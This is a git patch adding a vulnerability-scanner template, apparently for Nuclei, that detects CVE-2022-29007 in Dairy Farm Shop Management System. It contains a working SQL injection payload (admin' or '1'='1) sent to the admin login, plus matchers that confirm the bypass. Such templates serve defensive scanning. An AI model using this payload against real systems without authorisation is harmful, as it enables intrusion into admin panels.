From 14aa51739f9a2ef1939aa88ec2a4704696db4f23 Mon Sep 17 00:00:00 2001 From: TenBird-1 <109490477+TenBird-1@users.noreply.github.com> Date: Thu, 1 Sep 2022 22:14:30 +0900 Subject: [PATCH] CREATE CVE-2022-29007 CREATE CVE-2022-29007 --- cves/2022/CVE-2022-29007.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2022/CVE-2022-29007.yaml diff --git a/cves/2022/CVE-2022-29007.yaml b/cves/2022/CVE-2022-29007.yaml new file mode 100644 index 0000000000..d3b2fbe329 --- /dev/null +++ b/cves/2022/CVE-2022-29007.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-29007 +info: + name: Dairy Farm Shop Management System v1.0 - SQL Injection Authentication Bypass + author: TenBird + severity: Critical + description: Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29007 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29007 + cwe-id: CWE-89 + tags: cve,cve2022,SQL Injection + +requests: + - raw: + + - | + POST dfsms/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username=admin' or '1'='1&password=1&login=login + + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + part: header + words: + - 'Location: add-category.php' \ No newline at end of file